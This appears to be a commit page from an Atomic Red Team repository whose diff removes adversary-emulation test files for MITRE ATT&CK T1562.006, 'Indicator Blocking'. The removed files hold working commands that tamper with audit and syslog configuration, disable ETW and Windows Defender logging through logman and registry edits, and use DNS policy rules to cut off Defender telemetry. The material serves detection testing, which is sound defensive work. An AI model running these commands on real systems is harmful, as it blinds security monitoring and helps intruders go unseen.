security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first pass at updates for MITRE ATT&CK v19

Browse Source
This commit is contained in:
Phil Hagen
2026-04-28 20:37:38 -06:00
parent c7310aa427
commit 474f9a4aec
35 changed files with 970 additions and 1007 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1562.006/T1562.006.md
-407
View File
@@ -1,407 +0,0 @@
# T1562.006 - Impair Defenses: Indicator Blocking
## Description from ATT&CK
> An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
>
> For example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)
>
> ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.
>
> In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.
>
> In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi)
[Source](https://attack.mitre.org/techniques/T1562/006)
## Atomic Tests
- [Atomic Test #1: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
- [Atomic Test #2: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
- [Atomic Test #3: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
- [Atomic Test #4: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
- [Atomic Test #5: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
- [Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
- [Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
- [Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
- [Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
- [Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
- [Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
- [Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
- [Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
- [Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
### Atomic Test #1: Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
```
#### Cleanup Commands
```bash
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
```
### Atomic Test #2: Auditing Configuration Changes on FreeBSD Host
Emulates modification of auditd configuration files
**Supported Platforms:** Linux
**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
```
#### Cleanup Commands
```sh
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
```
### Atomic Test #3: Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf|
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
#### Cleanup Commands
```bash
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
```
### Atomic Test #4: Logging Configuration Changes on FreeBSD Host
Emulates modification of syslog configuration.
**Supported Platforms:** Linux
**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
```
#### Cleanup Commands
```sh
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
```
### Atomic Test #5: Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** Windows
**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pstools&#92;PsExec.exe|
| session | The session to disable. | string | EventLog-Application|
| provider | The provider to disable. | string | Microsoft-Windows-Powershell|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
```
#### Cleanup Commands
```powershell
cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
```
#### Dependencies: Run with `powershell`!
##### Description: PSExec must be installed on the machine.
###### Check Prereq Commands
```powershell
if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```
### Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
```
#### Cleanup Commands
```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
```
### Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
**Supported Platforms:** Windows
**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
```
#### Cleanup Commands
```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
```
### Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```
### Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** Windows
**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```
### Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b`
#### Attack Commands: Run with `command_prompt`!
```cmd
REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee`
#### Attack Commands: Run with `powershell`!
```powershell
New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
```
### Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
```
#### Cleanup Commands
```cmd
REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
```
### Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
**Supported Platforms:** Windows
**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
```
### Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
**Supported Platforms:** Windows
**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
```
#### Cleanup Commands
```powershell
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
```
atomics/T1562.006/T1562.006.yaml
-272
View File
@@ -1,272 +0,0 @@
attack_technique: T1562.006
display_name: 'Impair Defenses: Indicator Blocking'
atomic_tests:
- name: 'Auditing Configuration Changes on Linux Host'
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
audisp_config_file_name:
description: The name of the audispd configuration file to be changed
type: string
default: audispd.conf
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: auditd.conf
libaudit_config_file_name:
description: The name of the libaudit configuration file to be changed
type: string
default: libaudit.conf
executor:
command: |
sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}
else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}
cleanup_command: |
sed -i '$ d' /etc/audisp/#{audisp_config_file_name}
if [ -f "/etc/#{auditd_config_file_name}" ];
then sed -i '$ d' /etc/#{auditd_config_file_name}
else sed -i '$ d' /etc/audit/#{auditd_config_file_name}
fi
sed -i '$ d' /etc/#{libaudit_config_file_name}
name: bash
elevation_required: true
- name: 'Auditing Configuration Changes on FreeBSD Host'
auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd
description: |
Emulates modification of auditd configuration files
supported_platforms:
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
type: string
default: audit_event
executor:
command: |
echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name}
cleanup_command: |
sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name}
name: sh
elevation_required: true
- name: 'Logging Configuration Changes on Linux Host'
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
rsyslog_config_file_name:
description: The name of the rsyslog configuration file to be changed
type: string
default: rsyslog.conf
syslog_ng_config_file_name:
description: The name of the syslog-ng configuration file to be changed
type: string
default: syslog-ng.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i '$ d' /etc/#{syslog_config_file_name}
fi
if [ -f "/etc/#{rsyslog_config_file_name}" ];
then sed -i '$ d' /etc/#{rsyslog_config_file_name}
fi
if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ];
then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}
fi
name: bash
elevation_required: true
- name: 'Logging Configuration Changes on FreeBSD Host'
auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8
description: |
Emulates modification of syslog configuration.
supported_platforms:
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
type: string
default: syslog.conf
executor:
command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name}
fi
cleanup_command: |
if [ -f "/etc/#{syslog_config_file_name}" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name}
fi
name: sh
elevation_required: true
- name: Disable Powershell ETW Provider - Windows
auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84
description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
supported_platforms:
- windows
input_arguments:
ps_exec_location:
description: Location of PSExec.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
session:
description: The session to disable.
type: string
default: EventLog-Application
provider:
description: The provider to disable.
type: string
default: Microsoft-Windows-Powershell
dependency_executor_name: powershell
dependencies:
- description: PSExec must be installed on the machine.
prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
executor:
command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (cmd)
auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b
description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
supported_platforms:
- windows
executor:
command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Registry (powershell)
auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758
description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force
cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1
name: powershell
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd
auto_generated_guid: f6df0b8e-2c83-44c7-ba5e-0fa4386bec41
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
cleanup_command: |
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02
description: |
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force
cleanup_command: |
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd
auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell
auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled
name: powershell
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd
auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f
cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1
name: command_prompt
elevation_required: true
- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell
auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911
description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required.
supported_platforms:
- windows
executor:
command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force
cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled
name: powershell
elevation_required: true
- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table
auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca
description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com.
supported_platforms:
- windows
executor:
command: |-
Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table"
Clear-DnsClientCache
cleanup_command: |-
try {
# Get all current NRPT rules
$DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' }
# Remove each NRPT rule
foreach ($rule in $DnsClientNrptRules) {
Remove-DnsClientNrptRule -Name $rule.Name -Force
}
# Clear DNS client cache
Clear-DnsClientCache
Write-Host "All NRPT rules have been removed and the DNS cache has been cleared."
}
catch {
Write-Host "An error occurred: $_"
}
Clear-DnsClientCache
name: powershell
elevation_required: true
atomics/T1562/T1562.md
-82
View File
@@ -1,82 +0,0 @@
# T1562 - Impair Defenses
## Description from ATT&CK
> Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
>
> Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
>
[Source](https://attack.mitre.org/techniques/T1562)
## Atomic Tests
- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
### Atomic Test #1: Windows Disable LSA Protection
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
**Supported Platforms:** Windows
